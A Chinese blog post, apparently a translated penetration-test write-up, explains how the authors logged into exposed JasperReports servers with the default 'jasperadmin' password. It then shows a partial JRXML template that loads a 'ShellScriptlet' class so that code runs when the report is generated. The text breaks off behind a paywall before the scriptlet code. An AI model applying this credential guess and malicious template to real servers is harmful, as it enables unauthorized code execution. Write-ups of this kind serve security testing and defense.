Hacking JasperReports-隐藏shell的特征

最新推荐文章于 2022-12-12 15:32:36 发布
最新推荐文章于 2022-12-12 15:32:36 发布
阅读量714 收藏
点赞数
分类专栏: 渗透测试 文章标签: 安全 测试工具 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zeroyu_xyz/article/details/53980921
版权
本文讲述了在渗透测试中发现的JasperReports服务器的安全隐患。通过编辑报告模板JRXML文件,插入Java代码实现ShellScriptlet,从而在报告运行时获取shell。详细介绍了如何创建和部署恶意报告,以及如何监听和接收shell。
摘要由CSDN通过智能技术生成

不久前,我的同事跟我在对一个客户端进行渗透测试。我们确实发现的一件事是,他们留下了几个联网的JasperReports服务器。寻找默认管理帐户的用户名并没有花费太多的精力。
login

也没有用多久我们就猜解出密码是“jasperadmin”

我从前听过JasperReports但从来没有碰到过要对它进行渗透测试。一个快速的google搜索也没有对前期工作产生多大的作用。尽管这个管理界面很不常见但是它也没有摆脱以某种方式来执行代码,所以顺利成章的我们开始在渗透旅程中把JasperReports渗透测试添加进“容易成功”的列表。
##代码和小脚本

JasperReports的目的是提取数据从各种各样的来源,例如:databases, xml, flat files等等,并且基于用户定义的模板用某种方式生成一份漂亮的报告。模板在JasperReports被定义为“JRXML”文件,任何拥有创建编辑报告权限的用户都可以上传它。

JasperReports的设计者允许数据在被包含在报告之前自定义操作。接下来就是利用一些小技巧用Java来编写一段脚本!我想也许你会看到这个。

我们的目标呢,就是创建一个报告模板(JRXML file)当然是依旧定制的恶意脚本,当它运行时,我们可以收到一个shell。这篇文章的其余部分将会详细描述我们是如何将脚本和报告模板联系到一起的。

##编辑模板

我们仅仅编辑一个存在的模板而不是创建一个。以下是我们将使用的模板。注意一下,过于复杂以及其中的90%是完全不必要的。下面这个只是一个带有“JasperStudio”的简单样本报告。35–42行是有趣的一个部分,我在这个部分插入了“ShellScriptlet”。

shell.jrxml

<? xml  version = "1.0"  encoding = "UTF-8" ?>
<!-- Created with Jaspersoft Studio version 6.0.1.final using JasperReports Library version 6.0.0 -->
<!-- 2016-10-04T14:01:12 -->
< jasperReport xmlns = "http://jasperreports.sourceforge.net/jasperreports" xmlns:xsi = "http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation = "http://jasperreports.sourceforge.net/jasperreportshttp://jasperreports.sourceforge.net/xsd/jasperreport.xsd" name = "AllAccounts"  pageWidth = "595"  pageHeight = "842" whenNoDataType = "AllSectionsNoDetail"  columnWidth = "515" leftMargin = "40"  rightMargin = "40"  topMargin = "50" bottomMargin = "50"  isSummaryWithPageHeaderAndFooter = "true" uuid = "17f4b3c5-e096-4a65-b030-ed3bb58ce311" >
< property  name = "net.sf.jasperreports.export.pdf.tag.language" value = "EN-US" />
< style  name = "Sans_Normal"  isDefault = "true" fontName = "DejaVu Sans"  fontSize = "12" />
< style  name = "Sans_Bold"  fontName = "DejaVu Sans" fontSize = "12"  isBold = "true" />
< style  name = "Sans_Italic"  fontName = "DejaVu Sans" fontSize = "12"  isItalic = "true" />
< style  name = "PageHeader"  style = "Sans_Bold" forecolor = "#FFFFFF"  backcolor = "#333333" />
< style  name = "detail"  fontName = "DejaVu Sans" fontSize = "12" >
< conditionalStyle >
< conditionExpression > <![CDATA[new Boolean($V{CityGroup_COUNT}.intValue() % 2 == 0)]]> </ conditionExpression >
< style  mode = "Opaque"  backcolor = "#E0E0E0" />
</ conditionalStyle >
</ style >
< subDataset  name = "Table Dataset 1"  uuid = "4fcc1d09-9859-48ee-bb6f-8d369bd49113" >
< queryString >
<![CDATA[SELECT name, phone_office, billing_address_city, billing_address_street, billing_address_country FROM accounts ORDER BY billing_address_country, billing_address_city]]>
</ queryString >
< field  name = "name"  class = "java.lang.String" />
< field  name = "phone_office"  class = "java.lang.String" />
< field  name = "billing_address_city" class = "java.lang.String" />
< field  name = "billing_address_street" class = "java.lang.String" />
< field  name = "billing_address_country" class = "java.lang.String" />
< sortField  name = "billing_address_country" />
< sortField  name = "billing_address_city" />
< variable  name = "CityyNumber"  class = "java.lang.Integer" incrementType = "Group"  incrementGroup = "CityGroup" calculation = "Count" >
< variableExpression > <![CDATA[Boolean.TRUE]]> </ variableExpression >
< initialValueExpression > <![CDATA[new Integer(0)]]> </ initialValueExpression >
</ variable >
< group  name = "CityGroup" >
< groupExpression > <![CDATA[$F{billing_address_city}]]> </ groupExpression >
</ group >
</ subDataset >
< scriptlet  name = "ShellScriptlet" class = "foxglove.shell.ShellScriptlet" >
< scriptletDescription > <![CDATA[]]> </ scriptletDescription >
</ scriptlet >
< title >
< band  height = "79"  splitType = "Stretch" >
< textField >
< reportElement  x = "227"  y = "20"  width = "100" height = "30"  uuid = "32a2a8ff-d90a-48d7-b044-5325b5c6264f" />
< textFieldExpression > <![CDATA[$P{ShellScriptlet_SCRIPTLET}.getShell()]]> </ textFieldExpression >
</ textField >
</ band >
</ title >
< pageFooter >
< band  height = "40" >
     < line >
< reportElement  x =
最低0.47元/天 解锁文章
zeroier
关注
专栏目录
Hardware Hacking Introduction - Overview.pdf
10-06
网络安全渗透测试
Jasper Report v1.0用户手册中文版
热门推荐
薛笛的专栏
05-08 4万+
  Jasper Report用户手册version1.0   作者:薛笛 EMail:jxuedi@gmail.com严正声明:本来我在以前把JasperReport1.0的用户文档由中文译成了英文,花了两周多时间写了几万字,并把它贴到了CSDN的Blog上,并凡是要翻译完的PDF文档的朋友我都尽量给邮过去。但是最近我发现问我要文档的人总管我叫“良子大哥”
开源软件漏洞升级步骤
weixin_43012300的博客
07-22 1463
开源软件漏洞检测并升级步骤
Jasper Report 6.8 根据后台数据生成动态报表(JRXML文件实现)(三)JRXML文件生成过程(支持json,bean,map list数据源)
u012896697的博客
06-23 1389
1、生成头信息及页面 protected Element createPageXmlFileRoot( ) { DftRptMaster dftRptMaster = rptInfo.getDftRptMaster(); DftViewMaster dftViewMaster = rptInfo.getDftViewMaster(); rptDomFileXml.addComment...
iReport 和 Jasperreport 整合开发 WEB 报表向导(二)
10-25 705
本文由 Jplateau 所撰写 版权归属于 Jplateau作者主页 http://plateau.sicool.com 在上一篇文档里我们初步介绍了 iReport 和 Jasperreport,基本上我们已经对它们有了一个最初的认识,在今天这篇文档里,我将深入的对 iReport 这个工具进行说明。 接着上篇文档的结尾,如果我们成功运行 iReport 的话
jasper报表通过字段隐藏指定位置
weixin_30518397的博客
08-12 698
转载于:https://www.cnblogs.com/xiao-zh/p/7350975.html
Virtual Hacking Lab-开源
05-29
"Virtual Hacking Lab-开源" 是一个专门为网络安全教育和学习设计的平台,它提供了一系列具有安全漏洞的应用程序和过时软件的镜像。这个平台旨在让使用者能够在安全的环境中实践和学习如何识别、利用和修复这些漏洞...
MVF: Movie hacking framework-开源
06-30
【MVF:Movie Hacking Framework 开源解析】 MVF,全称 Movie Hacking Framework,是一个专为模拟电影中常见的黑客场景而设计的开源项目。它允许用户通过一个类似电影中的界面来体验“黑客”操作,虽然实际上这些...
Fallout 3 Terminal Hacking Solver-开源
07-05
Fallout 3 Terminal Hacking Solver (F3THS) 旨在帮助破解视频游戏 Fallout 3 中的终端。您只需输入可用的单词,F3THS 将帮助您解决正确的密码。
Hacking-Android-and-IOS
03-08
标题 "Hacking-Android-and-iOS" 暗示了我们即将探讨的是针对这两种主流移动操作系统的安全漏洞利用和防护技术。在这个主题下,我们将深入理解Android和iOS系统的架构,了解它们的安全机制,并讨论可能存在的漏洞及...
JasperReport、ireport固定表头隐藏
01-11
本报表在jasperreports-5.6.0基础上增加以下功能; 1、 表头固定 2、 列的隐藏及显示 3、 列的固定 示例代码可正常运行、本代码为非正式版
ireport固定表头隐藏
01-03
本报表在jasperreports-5.6.0基础上增加以下功能; 1、 表头固定 2、 列的隐藏及显示 3、 列的固定 示例代码可正常运行、本代码为非正式版
JasperReport动态表头及按组分页,去掉了subreport
06-29
JasperReport动态表头及按组分页,去掉了subreport
JasperReport报表导出常见问题(内存泄漏)
最新发布
一个记录的地方
12-12 1620
JasperReport报表导出常见问题 (内存泄漏)
JasperReports实战问题 - 子报表
AugusChenEnc的博客
01-20 1777
系列文章目录 JasperReports实战问题 - 连续打印 JasperReports实战问题 - 组件隐藏显示 JasperReports实战问题 - Position Type: Float 应用 文章目录系列文章目录前言一、功能需求背景二、解决方案1、局部位置放置subreport组件2、配置SubReport3、父报表传递参数给子报表 前言 本文不是从零构建,所以需要一些基本环境基础和概念 本文重点讲述解决问题的关键点。 JasperReports版本:6.2.2 Jaspersoft S
JasperReports实战问题 - 组件隐藏显示
AugusChenEnc的博客
01-20 1493
系列文章目录 JasperReports实战问题 - 连续打印 JasperReports实战问题 - 子报表 JasperReports实战问题 - Position Type: Float 应用 文章目录系列文章目录前言一、功能需求背景二、解决方案 前言 本文不是从零构建,所以需要一些基本环境基础和概念 本文重点讲述解决问题的关键点。 JasperReports版本:6.2.2 Jaspersoft Studio版本:5.6.0 一、功能需求背景 一个集合的数据进行数据列印,原有报表模板列印出
Jaspersoft高阶功能 报表列的显示与隐藏
吉哲的博客
11-11 886
熟练掌握该工具基本使用的可以直接阅读该步骤,帮您解决问题。:数据即测试数据(库表数据);模板即简易功能测试模板。:这里我们把最后一列作为我们的隐藏列,作为例子。
Jasper Report详细使用教程(保姆级教程),整合Springboot使用
c_2333的博客
09-11 2万+
Springboot中使用PDF报表 Jaspersoft studio的使用
[iReport总结3] EBS使用jasper report进行报表开发
Shawn的ADF空间
02-06 1031
1,实现java类,生成PDF或Excel等类型的文件 可以参考前面的文章: Java代码导出Jasperreport 注意jasper文件的路径和生成PDF文件的路径处理。 将开发好的工程打成Jar包,Shell脚本的Java命令要使用该类。 2,定义基于Shell并发程序 1)编写shell脚本: exportpdf.prog 该脚本主要功能是调用1中实现的Java类去
伦理黑客赚钱指南:WebHacking101
《WebHacking101:如何在道德上赚钱黑客》是一本由Peter Yaworski撰写的老版本英文书籍,主要针对网络安全领域,特别是web hacking(网络漏洞挖掘)的主题。作者以一种教育和实用的方式探讨了黑客技术在道德边界内的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值